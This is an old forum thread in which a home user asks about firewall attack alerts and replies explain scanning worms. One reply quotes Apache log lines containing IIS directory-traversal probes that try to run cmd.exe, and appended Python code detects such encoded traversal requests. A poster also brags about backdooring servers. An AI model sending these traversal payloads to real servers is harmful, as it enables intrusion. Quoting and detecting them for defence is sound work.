|
|||
Hackers?...
i have PC-cillin running with a firewall, and it tells me that i have had attacks... but the scary thing is, every time i check the (Time of last attack) it changes every damn minute to the most recent.
Last attack: NetBIOS Browsing Source of last attack: 24.83.169.80 <---- that changes quite frequently---- can someone tell me if they can hack thru the firewall and what are they exactly trying to do... well not exactly but why do hackers try to get into other ppls computers :finger: |
|
|||
welcome to the internet!
most likely 99% of those "attacks" you are seeing are not "hackers" as you think they are.. just harmless "internet background noise" as i like to call it.. this can be the result of servers responding to data requests from your computer, improperly terminated sessions from various websites, random pinging from various places, or responses to various internet enabled applications on your computer. requests for NetBIOS info may be someone scanning a block of ip addresses looking for open shares etc. on computers, so not directly targeting you (unless you're stupid and have open shares). i used to do this myself, just for fun. so don't worry, even though most/all software personal firewalls offer false senses of security and can be bypassed completely or forced to crash (via packet flooding, etc.) and allow someone who knows what they're doing like me to access your computer if they are really determined to get in. But really most of us that know how go for bigger stuff, not individual personal computers that have no real use to get into.. i would rather break into a server, and set up a backdoor and an anonymous ftp or something useful like that.. ps: your name really does suit you. |
|
|||
Hackers don't really give a shit about half-wit computer users, we usually look for major corporate networks with porn stashed in the head engineer's /home dir. heh. But seriously though, there's lots of worms going around. Nimda, which tries to access open shares (which is accessible through port 139/135UDP - Netbios.)
That's probably what's nailing you. For instance, here's an example of the last day's port 80 (WWW) logs:

root@niobe..[/var/log/apache]# cat access.log|grep 08/Mar|wc -l
20

See, 20 attempts today.

24.2.209.70 - - [08/Mar/2004:20:02:38 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 "-" "-"
24.2.209.70 - - [08/Mar/2004:20:02:38 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
24.2.209.70 - - [08/Mar/2004:20:02:39 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
24.2.209.70 - - [08/Mar/2004:20:02:39 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
24.2.209.70 - - [08/Mar/2004:20:02:39 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
24.2.209.70 - - [08/Mar/2004:20:02:40 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
24.2.209.70 - - [08/Mar/2004:20:02:40 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-"
24.2.209.70 - - [08/Mar/2004:20:02:40 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-"
24.2.209.70 - - [08/Mar/2004:20:02:41 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
24.2.209.70 - - [08/Mar/2004:20:02:41 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"

There's a lot of worms/scanners out there. They'll just scan a c-class of IP's and scan for everything. Open shares/IIS exploits, etc. Don't worry about it, buddy. If you run XP, just run the XP's built-in firewall. It's actually pretty good considering, don't pay for that PC-Cillin, etc.. bullshit, waste of money.

- neoh |
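
The request lines in the log above hide `../` and `..\` behind repeated percent-encoding and overlong UTF-8 bytes. As an added example that is not part of the original thread, this Python code normalizes request targets from an Apache access log and counts flagged requests per source; the sample lines, addresses and function names are constructed for illustration, and the overlong folding models a lax decoder as an assumption.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Constructed sample: request paths as in the post, documentation-range source IPs.
SAMPLE_LOG = '''\
192.0.2.10 - - [08/Mar/2004:20:02:38 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 "-" "-"
192.0.2.10 - - [08/Mar/2004:20:02:39 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
192.0.2.10 - - [08/Mar/2004:20:02:40 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-"
198.51.100.7 - - [08/Mar/2004:20:05:12 -0800] "GET /search?q=100%25+cotton HTTP/1.0" 200 512 "-" "-"
'''

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')
OVERLONG = re.compile(rb"[\xc0\xc1].", re.DOTALL)  # lead bytes never valid in UTF-8
TRAVERSAL = re.compile(r"\.\.[/\\]")


def normalize(target):
    """Return (normalized target, set of encoding tricks seen)."""
    raw, tricks, rounds = target.encode("latin-1", "replace"), set(), 0
    while rounds < 5:  # bounded: decode until nothing changes
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw, rounds = decoded, rounds + 1
    if rounds > 1:
        tricks.add("multi-encoded")
    if OVERLONG.search(raw):
        tricks.add("overlong-utf8")
        # Assumption: model a lax decoder that keeps the low 6 bits of byte two.
        raw = OVERLONG.sub(
            lambda m: bytes([((m[0][0] & 0x1F) << 6) | (m[0][1] & 0x3F)]), raw)
    return raw.decode("latin-1").lower(), tricks


def classify(target):
    """Sorted reasons a request target looks like a traversal probe, or []."""
    norm, tricks = normalize(target)
    return sorted(tricks | {"traversal"}) if TRAVERSAL.search(norm) else []


def probes_by_source(log_text):
    """Count flagged requests per client address."""
    hits = Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and classify(m.group(2)):
            hits[m.group(1)] += 1
    return hits
```

Calling `probes_by_source(SAMPLE_LOG)` attributes three flagged requests to one source and none to the benign search request, which is the pattern of a single scanner sweeping through variants.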
|
|||
http://www.robertgraham.com/pubs/firewall-seen.html
a little complex, but possibly the most valuable bit of information about one's computer is how to interpret firewall logs. this site is probably the most thorough of any i've seen to explain things like this. |